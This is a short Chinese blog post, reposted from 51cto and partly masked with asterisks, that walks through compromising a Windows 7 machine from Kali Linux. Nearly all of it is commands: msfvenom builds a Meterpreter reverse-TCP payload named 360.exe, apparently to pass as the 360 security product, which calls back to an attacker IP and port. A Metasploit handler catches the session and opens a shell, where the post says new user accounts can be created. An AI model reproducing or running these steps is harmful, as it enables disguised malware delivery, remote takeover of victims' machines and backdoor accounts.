kali之***Win7系统1
写***文件,并赋予权限
[email protected]:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exe
[email protected]:~#chmod 777 360.exe
配置网络信息
开启PostgreSQL: service postgresql start
开启metasploit: service metasploit start
[email protected]:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.48.123
msf exploit(handler) > set lport 33389
msf exploit(handler) > exploit -z -j
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1
meterpreter > shell 进入shell里可以在此处创建账户密码
查看系统信息,用户权限
本文出自 “马广杰——博客” 博客,转载请与作者联系!
转载于:https://blog.51cto.com/losering/1943658